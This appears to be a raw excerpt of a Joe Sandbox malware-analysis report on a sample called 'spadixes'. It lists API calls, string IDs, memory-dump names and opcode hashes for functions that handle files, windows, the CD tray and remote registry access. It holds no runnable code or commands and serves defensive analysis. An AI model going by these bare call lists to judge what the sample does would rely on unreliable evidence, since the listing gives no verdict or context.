                                                                                                                                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                        • Instruction Fuzzy Hash: A9E08C31905208EBEB20DAACC906AAD73A8FB04321F004A54B916CB2C0D6308A40D7D0
                                                                                                                                                        APIs
                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,?,00000000,00000002), ref: 008C3AB3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3098949447-0
                                                                                                                                                        • Opcode ID: 0965b3319f474b804fb14e6aa7b544ff1a9c94f6ae6fd96ff081c9d85e774f2d
                                                                                                                                                        • Instruction ID: 3da2b4d757c980145eb236f92453eb60a38ed74552e194f634c035d3dae2564c
                                                                                                                                                        • Opcode Fuzzy Hash: 0965b3319f474b804fb14e6aa7b544ff1a9c94f6ae6fd96ff081c9d85e774f2d
                                                                                                                                                        • Instruction Fuzzy Hash: 10D02B363681009BC300EF48EC09E19B7A4FBA4710F00451BF604833B2CB215C51DB92
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 015D0863
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                        • Instruction ID: 0e777a97f4be29b0ebbdab6da7949d542ade10528619c937959626456b453ba7
                                                                                                                                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                        • Instruction Fuzzy Hash: 3BD05E3094520CEBCB20CAA89905AAD73A8EB05361F104754F915972C0D53199009794
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 015D2279
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                        • Instruction ID: 7d38440904e9781b2735d429601c5b70475763bcd6f7ef396a501d7382e4c6a8
                                                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                        • Instruction Fuzzy Hash: D1E0E67498020DDFDB00DFB8D54969D7BB4FF04301F100161FD05D2280D6309D50CA62
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
                                                                                                                                                          • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00905FA6,?), ref: 00906EF1
                                                                                                                                                          • Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090727B
                                                                                                                                                          • Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090728E
                                                                                                                                                          • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
                                                                                                                                                        • _wcscat.LIBCMT ref: 00906149
                                                                                                                                                        • _wcscat.LIBCMT ref: 00906167
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 0090618E
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 009061A4
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00906209
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090621C
                                                                                                                                                        • _wcscat.LIBCMT ref: 0090622F
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0090625D
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0090626E
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00906289
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00906298
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 009062AD
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 009062BE
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009062E1
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 009062FD
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0090630B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1917200108-1173974218
                                                                                                                                                        • Opcode ID: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
                                                                                                                                                        • Instruction ID: 42d056a01f74b427371b484ee00ad21dacb76dd8e424097bcf299def20d0f31b
                                                                                                                                                        • Opcode Fuzzy Hash: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
                                                                                                                                                        • Instruction Fuzzy Hash: A6515E7680811CAECB21EB95CC44DEFB7BCAF05300F0504EAE595E2141DB76A7898FA4
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0091A2FE
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0091A310
                                                                                                                                                        • DestroyWindow.USER32 ref: 0091A31E
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0091A338
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0091A33F
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0091A480
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0091A490
                                                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A4D8
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0091A4E4
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0091A51E
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A540
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A553
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A55E
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0091A567
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A576
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0091A57F
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A586
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0091A591
                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A5A3
                                                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0094D9BC,00000000), ref: 0091A5B9
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0091A5C9
                                                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0091A5EF
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0091A60E
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A630
                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A81D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                        • Opcode ID: 369e604c8ebf61e8619be5ba7655a06628c587da455329a01522f831f0a5d199
                                                                                                                                                        • Instruction ID: 35ce79879d87d7edb4c4809213e5e342a21042b45d3b083a1faeff2b444307d3
                                                                                                                                                        • Opcode Fuzzy Hash: 369e604c8ebf61e8619be5ba7655a06628c587da455329a01522f831f0a5d199
                                                                                                                                                        • Instruction Fuzzy Hash: 62028F79A11208EFDB14DFA8CD89EAE7BB9FB49310F108158F9159B2A0C770ED41DB61
                                                                                                                                                        APIs
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0092D2DB
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0092D30C
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0092D318
                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0092D332
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0092D341
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0092D36C
                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 0092D374
                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0092D37B
                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 0092D38A
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0092D391
                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0092D3DC
                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 0092D40E
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0092D439
                                                                                                                                                          • Part of subcall function 0092D575: GetSysColor.USER32(00000012), ref: 0092D5AE
                                                                                                                                                          • Part of subcall function 0092D575: SetTextColor.GDI32(?,?), ref: 0092D5B2
                                                                                                                                                          • Part of subcall function 0092D575: GetSysColorBrush.USER32(0000000F), ref: 0092D5C8
                                                                                                                                                          • Part of subcall function 0092D575: GetSysColor.USER32(0000000F), ref: 0092D5D3
                                                                                                                                                          • Part of subcall function 0092D575: GetSysColor.USER32(00000011), ref: 0092D5F0
                                                                                                                                                          • Part of subcall function 0092D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0092D5FE
                                                                                                                                                          • Part of subcall function 0092D575: SelectObject.GDI32(?,00000000), ref: 0092D60F
                                                                                                                                                          • Part of subcall function 0092D575: SetBkColor.GDI32(?,00000000), ref: 0092D618
                                                                                                                                                          • Part of subcall function 0092D575: SelectObject.GDI32(?,?), ref: 0092D625
                                                                                                                                                          • Part of subcall function 0092D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0092D644
                                                                                                                                                          • Part of subcall function 0092D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0092D65B
                                                                                                                                                          • Part of subcall function 0092D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0092D670
                                                                                                                                                          • Part of subcall function 0092D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0092D698
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3521893082-0
                                                                                                                                                        • Opcode ID: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
                                                                                                                                                        • Instruction ID: 5a768c1b9735b0c4f7a0114792d6bc922872a55520ff9fbdb5e34048b300f1cf
                                                                                                                                                        • Opcode Fuzzy Hash: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
                                                                                                                                                        • Instruction Fuzzy Hash: 2A91B17940E311BFD7109F64DC08E6B7BA9FF8A325F100A19F962961E4C730D944DB92
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                                                                                          • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0090D292
                                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 0090D2DF
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D327
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D35E
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D38C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                        • API String ID: 1148790751-4113822522
                                                                                                                                                        • Opcode ID: 7b31281d25b86b0e338245e78b1c0bd398188ecd2f77e59fa43fce78f84a7b9f
                                                                                                                                                        • Instruction ID: 7bdf4fcbe5467b412431b2a571ba3e4f778043b181f8d12131e3767e2ca71b82
                                                                                                                                                        • Opcode Fuzzy Hash: 7b31281d25b86b0e338245e78b1c0bd398188ecd2f77e59fa43fce78f84a7b9f
                                                                                                                                                        • Instruction Fuzzy Hash: B15118751142059FC704EF28C882E6AB7F8FF98758F04896DF899A7291DB31EE05CB52
                                                                                                                                                        APIs
                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0090D0D8
                                                                                                                                                        • __swprintf.LIBCMT ref: 0090D0FA
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0090D137
                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0090D15C
                                                                                                                                                        • _memset.LIBCMT ref: 0090D17B
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 0090D1B7
                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0090D1EC
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0090D1F7
                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0090D200
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0090D20A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                                                        • Opcode ID: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
                                                                                                                                                        • Instruction ID: c68aaa010d593c3eb8292725f863e51d5ef71ecc95fb01cbf227047e502b48fd
                                                                                                                                                        • Opcode Fuzzy Hash: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
                                                                                                                                                        • Instruction Fuzzy Hash: 3531C1BA515109ABDB21DFA4CC48FEF37BCEF8A704F1040B6F519D21A1EB7096449B25
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 008FA1DC
                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008FA211
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008FA22D
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008FA249
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008FA273
                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 008FA29B
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2A6
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2AB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                        • API String ID: 1687751970-22481851
                                                                                                                                                        • Opcode ID: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
                                                                                                                                                        • Instruction ID: f78ac7668bd2df6d6f26a949ce2a4d37b4d86e1a0a3d6197d252fca948f657b5
                                                                                                                                                        • Opcode Fuzzy Hash: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
                                                                                                                                                        • Instruction Fuzzy Hash: 44410676C1022DABDF25EBA8DC85EEDB7B8FF14710F044029E905A3160EB719E45DB51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                                                                                          • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0091034B
                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009103DE
                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 009103F2
                                                                                                                                                        • CoCreateInstance.OLE32(0094DA8C,00000000,00000001,00973CF8,?), ref: 0091043E
                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009104AD
                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00910505
                                                                                                                                                        • _memset.LIBCMT ref: 00910542
                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0091057E
                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009105A1
                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 009105A8
                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009105DF
                                                                                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 009105E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1246142700-0
                                                                                                                                                        • Opcode ID: 2193265fb5b2cc888c463b8fa4a9e3f1505dcdab64e51b18fa4ca47fe4ab3f9b
                                                                                                                                                        • Instruction ID: 3ce46216976e94da598309814ea2575ac59f2ce47a66974e8e8eea3020605a1a
                                                                                                                                                        • Opcode Fuzzy Hash: 2193265fb5b2cc888c463b8fa4a9e3f1505dcdab64e51b18fa4ca47fe4ab3f9b
                                                                                                                                                        • Instruction Fuzzy Hash: 00B1EF75A00209AFDB04DFA5C888EAEBBB9FF89304B148459F905EB251D771ED81CF51
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 008E5047
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 008E50E0
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 008E5116
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 008E5133
                                                                                                                                                        • __allrem.LIBCMT ref: 008E5189
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51A5
                                                                                                                                                        • __allrem.LIBCMT ref: 008E51BC
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51DA
                                                                                                                                                        • __allrem.LIBCMT ref: 008E51F1
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E520F
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 008E5280
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                        • Instruction ID: 929be93cc074400216a79a274c6eda0f4636eec65b2b1f0b558b5cbbbe27db5d
                                                                                                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
